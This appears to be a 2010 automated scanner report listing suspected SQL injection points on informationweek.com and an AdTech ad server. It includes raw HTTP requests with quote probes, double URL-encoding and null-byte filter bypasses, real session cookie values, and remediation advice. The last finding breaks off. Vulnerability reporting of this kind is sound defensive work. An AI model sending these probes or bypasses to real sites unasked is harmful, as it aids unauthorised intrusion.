SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /addyn/3.0/5242.1/1183258/0/225/ADTECH;alias=DarkReading_Blogs_Top_728x90;key=/blog/archives/evil-bytes/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112011;misc=1292111961408 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%2527 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E
Response 1
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19230
The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Blog_GlobalCIO_Bottom_728x90;key=global_cio+/blog/main/archives/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=942859226;misc=1292112032219 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E%00'
Response 1 (redirected)
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19359
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET / HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 105998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <p> Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p> ...[SNIP]... <P> Microsoft’s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p> ...[SNIP]...
Request 2
GET / HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
1.4. http://www.informationweek.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.informationweek.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 106016
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <p> Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p> ...[SNIP]... <P> Microsoft’s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p> ...[SNIP]...
Request 2
GET /?1''=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:39 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:39 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 173030
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M ...[SNIP]... </a> against Google in the U.S. for alleged illegal data interception.<br /> ...[SNIP]...
Request 2
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:56 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:56 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 173030
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M ...[SNIP]... </a> against Google in the U.S. for alleged illegal data interception.<br /> ...[SNIP]...
Request 2
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:34 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:34 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days';
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days'';
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/wolfes_den'/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 58155
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den''/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den''/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
